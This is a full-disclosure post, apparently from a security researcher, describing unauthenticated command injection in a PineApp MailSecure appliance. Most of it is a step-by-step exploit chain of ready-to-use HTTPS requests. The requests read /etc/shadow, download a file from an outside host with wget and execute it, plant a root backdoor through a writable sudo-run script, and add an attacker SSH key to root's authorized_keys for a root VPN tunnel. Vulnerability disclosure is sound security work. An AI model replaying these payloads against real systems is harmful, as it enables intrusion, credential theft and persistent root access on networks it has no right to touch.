Hi, related this: http://seclists.org/fulldisclosure/2013/Nov/136 In February 2013 I send Pineapp the following information: ----------------------------------------------------------------- It is possible execute any command bash as qmailq unprivilege user, sending only the following https request, without authentication. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;%20cat%20/etc/shadow To upload any file (script, binary, etc...) it is possible with wget command. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile Download and execute it is possible with this request: https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile;chmod%20+x%20somefile;/tmp/somefile Details of bug: Lines 115-120 of /srv/www/htdocs/admin/confnetworking.html ----------------snip----------------- <? $query=explode("\n",shell_exec("/usr/bin/host -t '$nstype' '$hostip' $nsserver")); foreach ($query as $line) if ($line) echo preg_replace("/\t/"," ",$line)."<br>\n"; ?> ----------------snip----------------- Also it is possible make privilege escalation to root with a weak sudoers configuration, on /tmp/rc.firewall file. If you overwrite this file with this content: --------- #!/bin/bash $1 --------- you must get a privileged backdoor. It is possible with the following request: https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo'%23!/bin/bash' > /tmp/fileheader https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo'$1' > /tmp/filecode https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;mv/tmp/rc.firewall /tmp/rc.firewall_ https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;cat/tmp/fileheader /tmp/filecode > /tmp/rc.firewall https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;chmod%2bx /tmp/rc.firewall https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;rm/tmp/fileheader https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;rm/tmp/filecode And execute commands as root with: https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;chmod%2bx /tmp/rc.firewall 'whoami' With this, you can sent a private ssh key and get access by ssh service. To perform this you can make the following request: https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo'%73%73%68%2d%72%73%61%20%41%41%41%41%42%33%4e%7a%61%43%31%79%63%32%45%41%41%41%41%42%49%77%41%41%41%51%45%41%79%54%6f%4c%32%75%6b%51%36%4c%76%44%6a%78%51%65%4e%55%72%54%59%35%2b%51%66%57%37%47%51%52%4c%51%68%44%4f%69%77%7a%46%48%42%4a%66%33%59%66%49%44%50%6f%74%45%48%41%4d%43%7a%75%45%48%56%72%34%49%2f%41%77%52%73%78%76%4a%44%2b%4e%55%2b%2b%53%65%72%34%76%7a%35%4d%68%53%6c%50%37%64%47%53%78%47%58%39%31%37%7a%4b%53%53%4b%33%79%55%78%33%42%75%46%44%38%49%52%53%46%51%47%35%64%33%75%50%72%46%63%2f%4d%2b%33%61%37%30%4f%7a%45%44%2f%59%71%79%75%53%63%35%64%79%4c%64%67%59%32%61%47%77%6f%48%77%6a%4e%6f%5a%6b%79%65%44%77%72%67%63%2b%50%65%57%66%78%57%37%63%44%39%72%2f%4f%56%6d%38%59%49%61%70%7a%75%34%37%77%65%71%53%70%38%70%37%2b%43%58%4f%45%41%4c%64%2b%50%4e%54%79%4b%30%43%34%7a%51%58%37%72%35%6d%37%79%48%45%34%50%74%31%6f%75%41%43%45%6c%46%56%38%4a%4f%4f%45%38%4c%49%76%38%55%4a%67%57%30%43%64%41%55%4f%48%6a%49%75%2b%5a%6f%6d%35%54%71%50%73%72%6e%70%64%44%4e%59%6e%2b%76%33%6d%33%57%76%4f%50%71%36%66%69%38%61%72%79%53%33%61%4e%6e%7a%53%74%51%4e%5a%61%33%35%50%64%75%42%4a%49%39%33%4e%41%79%4f%48%54%59%54%31%75%56%6a%6c%79%55%51%3d%3d%20%72%75%62%65%6e%40%72%75%62%65%6e%2d%6c%61%70%74%6f%70' > /tmp/key.pub https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall 'mv /root/.ssh/authorized_keys /root/.ssh/authorized_keys_' https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall 'cp /root/.ssh/authorized_keys /tmp' https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;cat/tmp/authorized_keys /tmp/key.pub > /tmp/keys.pub https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall 'mv /tmp/keys.pub /root/.ssh/authorized_keys' https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall 'chown root:root /root/.ssh/authorized_keys' https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo%20/tmp/rc.firewall'killall sshd' https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo%20/tmp/rc.firewall'sshd' This key have password: '1234' Now you can get access with ssh as root and up tun interface with the appliance with ssh client: ssh root@192.168.24.24 -p 7022 -w0:0 -i /home/ruben/key With this the attacker have a VPN on the same network segment of MailSecure appliance vulnerable. ----------------------------------------------------------------- This I made a live demo of vulnerability, but don't revealed the manufacturer, then the bugs was not fixed. http://boken00.blogspot.com.es/2012/11/ii-conferencias-de-seguridad-navaja.html Video demo will be release soon on my blog. Version affected: MailSecure <= 5099SK Credits: ----------- Ruben Garrote Garc�a rubengarrote [at] gmail [dot] com http://boken00.blogspot.com